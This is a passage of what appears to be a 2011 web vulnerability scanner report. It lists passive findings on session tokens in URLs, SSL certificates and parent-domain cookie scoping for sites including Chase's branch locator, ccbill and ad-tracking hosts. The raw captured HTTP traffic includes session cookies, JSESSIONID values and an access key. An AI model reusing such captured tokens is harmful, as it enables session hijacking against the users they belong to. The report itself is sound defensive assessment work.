Cookie: __utma=53040939.1400319473.1310517107.1310517107.1310517107.1; __utmb=53040939.7.10.1310517107; __utmc=53040939; __utmz=53040939.1310517107.1.1.utmcsr=riema.ri.gov|utmccn=(referral)|utmcmd=referral|utmcct=/; font_level=0

Response

HTTP/1.1 302 Found
Date: Wed, 13 Jul 2011 00:33:56 GMT
Server: www
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Wed, 13 Jul 2011 00:33:56 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 27c333941c8c80ef374fc9b4c26a2b6c=pdsbkbuon9vkibc63q4ad7ar52; path=/
Location: /Licensing/
Vary: Accept-Encoding
Content-Length: 0
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

8. Session token in URL previous next
There are 10 instances of this issue:

http://bh.contextweb.com/bh/set.aspx
http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/
http://fls.doubleclick.net/activityi
http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm
https://locator.chase.com/
https://locator.chase.com/LocatorAction.do
https://locator.chase.com/LocatorAction.do
https://locator.chase.com/images/logo107x20.gif
https://locator.chase.com/jsp/SearchPage.jsp
http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

8.1. http://bh.contextweb.com/bh/set.aspx previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://bh.contextweb.com
Path:	/bh/set.aspx

Issue detail

The URL in the request appears to contain a session token within the query string:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21

Request

GET /bh/set.aspx?action=add&advid=2996&token=LOW21 HTTP/1.1
Host: bh.contextweb.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cr=355|1|-8588954932899850418|1%0a96|1|-8588950208424621064|1; C2W4=34DkJByS2sgGWcSZSsuSIpNMUY7ymKD5ZXzIovVtgKtwiicRQyPWQvA; FC1-WC=^56837_1_39y0y; cwbh1=1914%3B07%2F02%2F2011%3BHWHS1%0A357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A2866%3B07%2F06%2F2011%3BSHME2%0A1443%3B07%2F26%2F2011%3BNETM7; V=8vciuQJMXXJY; pb_rtb_ev=1:535039.ea5c094a-3a81-4d54-b8e2-975f65fd39a9.0|534889.csmq4atf04cxa.0|531292.AG-00000001389358554.0|534301.d7aeb157-aa7f-4dc8-ba2f-15ae36a8c609.0|530739.4dd07bc8-e97b-118c-3dec-7b8c5c306530.0|530912.WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP.0|530734.1461734246\B1305465412\B8\B2.0|537085.E3F32BD05A8DDF4D5646D79640088B.0|531399.1voofy6a0tk1w.0|535495.9ed3f2f2-7f5a-11e0-a07a-00259009a9e4.0|536088.2814750682866683.0|535461.4325897289836481830.0|538303.x.0

Response

HTTP/1.1 200 OK
Server: Sun GlassFish Enterprise Server v2.1.1
CW-Server: cw-web81
Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Fri, 06-Jul-2012 21:30:51 GMT; Path=/
Set-Cookie: cwbh1=357%3B07%2F17%2F2011%3BEMON1%3B07%2F24%2F2011%3BEHEX1%0A1443%3B07%2F26%2F2011%3BNETM7%0A2996%3B08%2F11%2F2011%3BLOW21; Domain=.contextweb.com; Expires=Wed, 15-Jun-2016 21:30:51 GMT; Path=/
Content-Type: image/gif
Date: Tue, 12 Jul 2011 21:30:51 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Content-Length: 49

GIF89a...................!.......,...........T..;

8.2. http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://blog.katango.com
Path:	/2011/07/05/how-facebook-affects-your-relationships-infographic/

Issue detail

The response contains the following links that appear to contain session tokens:

http://blog.katango.com/2011/07/05/how-facebook-affects-your-relationships-infographic/?like=1&_wpnonce=e687d1efc9

Request

GET /2011/07/05/how-facebook-affects-your-relationships-infographic/ HTTP/1.1
Host: blog.katango.com
Proxy-Connection: keep-alive
Referer: http://blog.katango.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hiab=nnascar; __qca=P0-1347206192-1310503617547

Response

8.3. http://fls.doubleclick.net/activityi previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://fls.doubleclick.net
Path:	/activityi

Issue detail

The response contains the following links that appear to contain session tokens:

http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21

Request

GET /activityi;src=1160694;type=lowes714;cat=homep272;ord=1;num=7992032719776.034? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.lowes.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Tue, 12 Jul 2011 21:30:49 GMT
Expires: Tue, 12 Jul 2011 21:30:49 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
Content-Length: 455
X-XSS-Protection: 1; mode=block

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title></title></head><body style="background-color: transparent"><img src="http://bh.contextweb.com/bh/set.aspx?action=add&advid=2996&token=LOW21" width="1" height="1" border="0"> <img src="http://leadback.advertising.com/adcedge/lb?site=695501&srvc=1&betr=lowesz_cs=1&betq=13252=436547" width = "1" height = "1" border = "0">
...[SNIP]...

8.4. http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://gw-services.vtrenz.net
Path:	/WebCookies/RegisterWebPageVisit.cfm

Issue detail

The URL in the request appears to contain a session token within the query string:

http://gw-services.vtrenz.net/WebCookies/RegisterWebPageVisit.cfm?accesskey=383ED628-AF06-4463-81DC-7F3477CEDFC3&v=2.02&isNewSession=1&type=pageview&sessionGUID=01294291-8d37-4c5e-56e4-79da9e81677a&webSyncID=14653cc8-09d7-804a-cc8b-04c4bccba599&url=http%3A%2F%2Ftrustedcs.com%2F&hostname=trustedcs.com&pathname=%2F

Request

GET /WebCookies/RegisterWebPageVisit.cfm?accesskey=383ED628-AF06-4463-81DC-7F3477CEDFC3&v=2.02&isNewSession=1&type=pageview&sessionGUID=01294291-8d37-4c5e-56e4-79da9e81677a&webSyncID=14653cc8-09d7-804a-cc8b-04c4bccba599&url=http%3A%2F%2Ftrustedcs.com%2F&hostname=trustedcs.com&pathname=%2F HTTP/1.1
Host: gw-services.vtrenz.net
Proxy-Connection: keep-alive
Referer: http://trustedcs.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BIGipServerb2b-gw-services.vtrenz.net-http=206010378.20480.0000

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 12 Jul 2011 18:09:11 GMT
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
Vary: Accept-Encoding
Content-Length: 0

8.5. https://locator.chase.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

https://locator.chase.com/images/logo107x20.gif;jsessionid=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2

Request

GET / HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:08:54 GMT
Server: Apache
Set-Cookie: JSESSIONID=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
<img src="/images/logo107x20.gif;jsessionid=D0ADAAE16A951A07FE1EEAE985EA56B3.ftc-web2" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.6. https://locator.chase.com/LocatorAction.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/LocatorAction.do

Issue detail

The URL in the request appears to contain a session token within the query string:

https://locator.chase.com/LocatorAction.do;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Request

GET /LocatorAction.do;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:02 GMT
Server: Apache
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...

8.7. https://locator.chase.com/LocatorAction.do previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/LocatorAction.do

Issue detail

The response contains the following links that appear to contain session tokens:

https://locator.chase.com/images/logo107x20.gif;jsessionid=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Request

Response

8.8. https://locator.chase.com/images/logo107x20.gif previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/images/logo107x20.gif

Issue detail

The URL in the request appears to contain a session token within the query string:

https://locator.chase.com/images/logo107x20.gif;jsessionid=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4

Request

GET /images/logo107x20.gif;jsessionid=1CB84E8D6F52FD50505DB367F6304AA6.ftc-web4 HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=C68735D6F1D6CA832EF05597DC582089.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:08 GMT
Server: Apache
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
ETag: W/"1983-1310075674000"
Last-Modified: Thu, 07 Jul 2011 21:54:34 GMT
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 1983
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif;charset=ISO-8859-1

GIF89ak...............@@@>>>....y.~~~.z.?...y..............z....///.x.......@.....___.x..x.....z.......ppp.z.......?...z..z..w.=..ooo.......y........x.@.....?..@........A..@............{..y....=...
...[SNIP]...

8.9. https://locator.chase.com/jsp/SearchPage.jsp previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	https://locator.chase.com
Path:	/jsp/SearchPage.jsp

Issue detail

The response contains the following links that appear to contain session tokens:

https://locator.chase.com/images/logo107x20.gif;jsessionid=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2

Request

GET /jsp/SearchPage.jsp HTTP/1.1
Host: locator.chase.com
Connection: keep-alive
Referer: https://locator.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; __utma=113094425.1259117557.1310486936.1310486936.1310486936.1; __utmb=113094425; __utmc=113094425; __utmz=113094425.1310486936.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); JSESSIONID=23ECC4A4BD991387CE19963C8C5BA577.ftc-web4

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:09:44 GMT
Server: Apache
Set-Cookie: JSESSIONID=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2; Path=/; Secure
Pragma: no-cache
cache-control: no-store
P3P: CP='ALL ADM DEV PSAi COM OUR OTRo STP IND ONL'
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Content-Length: 43237
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:
...[SNIP]...
<a href="https://www.chase.com" target="_self" >
<img src="/images/logo107x20.gif;jsessionid=E6E7F423B782399ACE6AFDF9C2ECA5B9.ftc-web2" border="0" id="logo" alt="Chase Home" />
</a>
...[SNIP]...

8.10. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The URL in the request appears to contain a session token within the query string:

http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.akqa.com%2F&callback=_xdc_._txgsed&token=4345

Request

GET /maps/api/js/AuthenticationService.Authenticate?1shttp%3A%2F%2Fwww.akqa.com%2F&callback=_xdc_._txgsed&token=4345 HTTP/1.1
Host: maps.googleapis.com
Proxy-Connection: keep-alive
Referer: http://www.akqa.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=UTF-8
Date: Tue, 12 Jul 2011 15:33:06 GMT
Server: mafe
Cache-Control: private
Content-Length: 37
X-XSS-Protection: 1; mode=block

_xdc_._txgsed && _xdc_._txgsed( [1] )

9. SSL certificate previous next
There are 7 instances of this issue:

https://store.popcap.com/
https://admin.ccbill.com/
https://affiliateadmin.ccbill.com/
https://bill.ccbill.com/
https://support.ccbill.com/
https://www.ccbill.com/
https://www.lowes.com/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

9.1. https://store.popcap.com/ previous next

Summary

Severity:	Medium
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/

Issue detail

The following problem was identified with the server's SSL certificate:

The server's certificate is not trusted.

The server presented the following certificates:

Server certificate

Issued to:	store.popcap.com
Issued by:	DigiCert High Assurance EV CA-1
Valid from:	Thu Sep 02 19:00:00 CDT 2010
Valid to:	Sun Nov 06 17:59:59 CST 2011

Certificate chain #1

Issued to:	DigiCert High Assurance EV CA-1
Issued by:	DigiCert High Assurance EV Root CA
Valid from:	Thu Nov 09 18:00:00 CST 2006
Valid to:	Tue Nov 09 18:00:00 CST 2021

Certificate chain #2

Issued to:	DigiCert High Assurance EV Root CA
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Sun Oct 01 00:00:00 CDT 2006
Valid to:	Sat Jul 26 13:15:15 CDT 2014

Certificate chain #3

Issued to:	Entrust.net Secure Server Certification Authority
Issued by:	Entrust.net Secure Server Certification Authority
Valid from:	Tue May 25 11:09:40 CDT 1999
Valid to:	Sat May 25 11:39:40 CDT 2019

9.2. https://admin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	admin.ccbill.com
Issued by:	Thawte SSL CA
Valid from:	Tue Dec 07 18:00:00 CST 2010
Valid to:	Thu Jan 12 17:59:59 CST 2012

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.3. https://affiliateadmin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	affiliateadmin.ccbill.com
Issued by:	Thawte SSL CA
Valid from:	Sun Dec 05 18:00:00 CST 2010
Valid to:	Thu Dec 15 17:59:59 CST 2011

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.4. https://bill.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://bill.ccbill.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	bill.ccbill.com
Issued by:	Thawte SSL CA
Valid from:	Tue Dec 07 18:00:00 CST 2010
Valid to:	Thu Jan 19 17:59:59 CST 2012

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.5. https://support.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	support.ccbill.com
Issued by:	Thawte SSL CA
Valid from:	Sun Aug 15 19:00:00 CDT 2010
Valid to:	Tue Aug 23 18:59:59 CDT 2011

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.6. https://www.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ccbill.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.ccbill.com
Issued by:	Thawte SSL CA
Valid from:	Tue Jul 27 19:00:00 CDT 2010
Valid to:	Thu Aug 04 18:59:59 CDT 2011

Certificate chain #1

Issued to:	Thawte SSL CA
Issued by:	thawte Primary Root CA
Valid from:	Sun Feb 07 18:00:00 CST 2010
Valid to:	Fri Feb 07 17:59:59 CST 2020

Certificate chain #2

Issued to:	thawte Primary Root CA
Issued by:	Thawte Premium Server CA
Valid from:	Thu Nov 16 18:00:00 CST 2006
Valid to:	Wed Dec 30 17:59:59 CST 2020

Certificate chain #3

Issued to:	Thawte Premium Server CA
Issued by:	Thawte Premium Server CA
Valid from:	Wed Jul 31 19:00:00 CDT 1996
Valid to:	Fri Jan 01 17:59:59 CST 2021

9.7. https://www.lowes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:	www.lowes.com,ST=North Carolina
Issued by:	Akamai Subordinate CA 3
Valid from:	Mon Sep 13 16:28:46 CDT 2010
Valid to:	Tue Sep 13 16:28:46 CDT 2011

Certificate chain #1

Issued to:	Akamai Subordinate CA 3
Issued by:	GTE CyberTrust Global Root
Valid from:	Thu May 11 10:32:00 CDT 2006
Valid to:	Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:	GTE CyberTrust Global Root
Issued by:	GTE CyberTrust Global Root
Valid from:	Wed Aug 12 19:29:00 CDT 1998
Valid to:	Mon Aug 13 18:59:00 CDT 2018

10. Cookie scoped to parent domain previous next
There are 44 instances of this issue:

http://login.dotomi.com/ucm/UCMController
http://scribe.twitter.com/scribe
http://www.homedepot.com/webapp/wcs/stores/servlet/OrderItemDisplay
http://ad.trafficmp.com/a/bpix
http://ak1.abmr.net/is/www.burstnet.com
http://ak1.abmr.net/is/www.imiclk.com
http://ak1.abmr.net/is/www.lowes.com
http://akamai.mathtag.com/sync/img
http://akamai.turn.com/r/dd/id/L21rdC85NC9jaWQvMzUxMTE3Ny90LzI/dpuid/C87B49F9CF448D1C1BA69C0215C3FF64
http://at.amgdgt.com/ads/
http://b.scorecardresearch.com/b
http://bh.contextweb.com/bh/set.aspx
http://bstats.adbrite.com/click/bstats.gif
https://iblogin.jpmorgan.com/sso/action/federateLogin
http://id.google.com/verify/EAAAAAA8ZuvsS7JEKK-IQjYnqI0.gif
http://id.google.com/verify/EAAAAB5TmvHS4JtvGgryw3OQbj8.gif
http://id.google.com/verify/EAAAALupUYoUPVshUibYW8x6f5I.gif
http://idcs.interclick.com/Segment.aspx
http://image2.pubmatic.com/AdServer/Pug
http://images.apple.com/global/nav/styles/navigation.css
http://images.apple.com/global/scripts/apple_core.js
http://images.apple.com/global/scripts/browserdetect.js
http://images.apple.com/global/scripts/lib/prototype.js
http://images.apple.com/global/scripts/lib/scriptaculous.js
http://images.apple.com/global/scripts/search_decorator.js
http://images.apple.com/global/styles/base.css
http://images.apple.com/global/styles/itunesmodule.css
http://images.apple.com/itunes/home/styles/home.css
http://images.apple.com/itunes/styles/itunes.css
http://leadback.advertising.com/adcedge/lb
http://pixel.mathtag.com/data/img
http://pixel.quantserve.com/pixel
http://pixel.rubiconproject.com/d.php
http://pixel.rubiconproject.com/tap.php
http://r.turn.com/r/beacon
http://sales.liveperson.net/hc/57386690/
http://store.popcap.com/cart.php
https://store.popcap.com/payment.php
http://www.burstnet.com/enlightn/3599//E519/
http://www.burstnet.com/enlightn/3893//392A/
http://www.burstnet.com/enlightn/5158//2CB4/
http://www.burstnet.com/enlightn/8117//3E06/
http://www.burstnet.com/enlightn/8171/99D2/
http://www.imiclk.com/cgi/r.cgi

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.

10.1. http://login.dotomi.com/ucm/UCMController previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://login.dotomi.com
Path:	/ucm/UCMController

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

DotomiSession_2339=2_371600815342543870$330100732990473967$335422886$1310489624594; Domain=.dotomi.com; Path=/
DotomiUser=330100732990473967$0$335422886; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
DotomiNet=2$DjQqblZ1RHBFAGZZAQZ%2BVAJHKSpAJ24SQR0PVVBLY3Jma1xARWZBXAEPW0dLS0BZYGBffm5mXnRRLwVZaVwXXjkZDVJ%2BewxzCUIBXmZTVkB0IyQsBAsRWgAbDwY%3D; Domain=.dotomi.com; Expires=Thu, 11-Jul-2013 16:53:44 GMT; Path=/
DotomiRR2339=-1$1$1$; Domain=.dotomi.com; Expires=Wed, 13-Jul-2011 16:53:44 GMT; Path=/

